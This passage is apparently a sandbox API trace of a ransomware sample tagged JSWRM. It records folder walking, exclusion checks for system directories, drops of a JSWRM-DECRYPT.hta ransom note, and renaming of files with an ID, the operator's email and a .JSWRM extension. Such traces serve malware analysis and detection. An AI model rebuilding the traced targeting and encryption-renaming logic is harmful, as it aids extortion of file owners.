[0068.581] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8899a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8899a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8899a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.581] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.581] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.582] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.582] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.582] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.584] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080253886321800) returned 0 [0068.584] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.584] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.584] CloseHandle (hObject=0xffffffff) returned 1 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.584] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.584] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.584] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.585] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2=".") returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="..") returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="...") returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="windows") returned -1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="recovery") returned -1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="perflogs") returned -1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="documents and settings") returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="$RECYCLE.BIN") returned 1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="system volume information") returned -1 [0068.585] lstrcmpiW (lpString1="lv-LV", lpString2="msocache") returned -1 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\jswrm-decrypt.hta")) returned 0xffffffff [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.586] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.586] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.588] CloseHandle (hObject=0x454) returned 1 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\jswrm-decrypt.hta")) returned 0x20 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.588] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8af989, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.588] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.588] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8af989, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.588] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.588] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.588] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8af989, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8af989, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8af989, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.588] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.589] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.589] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.589] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 